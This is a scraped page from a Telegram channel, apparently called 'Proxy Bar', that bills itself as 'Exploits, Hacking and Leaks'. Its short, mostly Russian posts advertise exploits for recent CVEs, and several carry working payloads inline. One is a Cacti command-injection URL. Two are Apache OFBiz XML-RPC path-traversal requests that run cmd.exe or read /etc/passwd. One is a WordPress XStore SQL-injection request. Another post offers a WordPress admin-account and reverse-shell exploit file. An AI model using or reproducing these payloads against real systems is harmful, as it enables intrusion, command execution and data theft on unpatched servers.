Proxy Bar – Telegram
Proxy Bar
19.5K subscribers
1.29K photos
79 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
слишком жирно)))
*
http://164.68.102.223/
*
😱5👌3
Linksys routers POCs
*
CVE-2024-33788 - POC exploit
CVE-2024-33789 - POC exploit
🔥10
Active Directory Hardening Series
*
Part 1 – Disabling NTLMv1
Part 2 – Removing SMBv1
Part 3 – Enforcing LDAP Signing
Part 4 – Enforcing AES for Kerberos

#AD
👍18🔥7
Инструмент для чтения контрольных вопросов и ответов.
Это возможно с помощью SamQueryInformationUser(UserResetInformation).
*
ReadResetData.c

#win
👍11🔥6
CVE-2024-26925 Linux LPE
*
Опять nf_tables
kernel 6.5 - 6.9-rc3
Эксплоит будет в паблике 24 мая
А пока подробности тут

#linux #lpe
🔥7👍3
Сдаем экзамен по Sliver C2 framework с легкостью бабочки ))
*
Lets go


#sliver
🔥17👍1
This media is not supported in your browser
VIEW IN TELEGRAM
Тут и сказать то нечего, было )))
Со звуком !

#Old
🔥46👍9
VPN
*
Разбираем различные методы обнаружения IP-адресов VPN от таких провайдеров, как NordVPN или ExpressVPN.
*
Читаем ТУТ
*
Большой список VPN exit NODE

#vpn #detect
👍21🔥9👌1
CVE-2024-29895 cacti
*
Command injection in cmd_realtime.php
*
fofa link
*
usage:
http://localhost/cacti/cmd_realtime.php?1+1&&calc.exe+1+1+1

#net
🔥21😱4👍2
UAF of wasm memory buffer due to mismatch of cached memory in graph-builder-interface in function ReloadInstanceCacheIntoSsa.
*
POC + exploit + video
🔥6
WordPress_Auto_Admin_Account_and_Reverse_Shell_cve_2024_27956.zip
3 KB
cve-2024-27956
*
WordPress Auto Admin Account Creation and Reverse Shell.
*
Дырка в плагине wp-automatic для выполнения SQL-запросов.

#wordpress
🔥16👍7
CVE-2024-27804
уязвимости ядра iOS/macOS, которая приводит к выполнению произвольного кода с привилегиями ядра.
*
POC exploit

#IOS #MAC #kernel
🔥18👍7😱4
CVE-2024-22026
*
Ivanti EPMM "MobileIron Core"
*
exploit
👍8
CVE-2024-32113 Apache-OFBiz
*
POC для WIN
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
<methodName>performCommand</methodName>
<params>
<param>
<value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
</param>
</params>
</methodCall>


POC для *NIX
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
<methodName>example.createBlogPost</methodName>
<params>
<param>
<value><string>../../../../../../etc/passwd</string></value>
</param>
</params>
</methodCall>
👍17🔥7
CVE-2024-33551
Уязвимость SQL inj, обнаруженная в 8theme XStore, платформе электронной коммерции, созданной на базе WordPress.
Уязвимость позволяет команды SQL в базе данных.
*
POC
POST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Upgrade-Insecure-Requests: 1


#wordpress #sql
🔥25
CVE-2024-27130
*
RCE on a vulnerable QNAP device.
*
POC exploit
👍11🔥4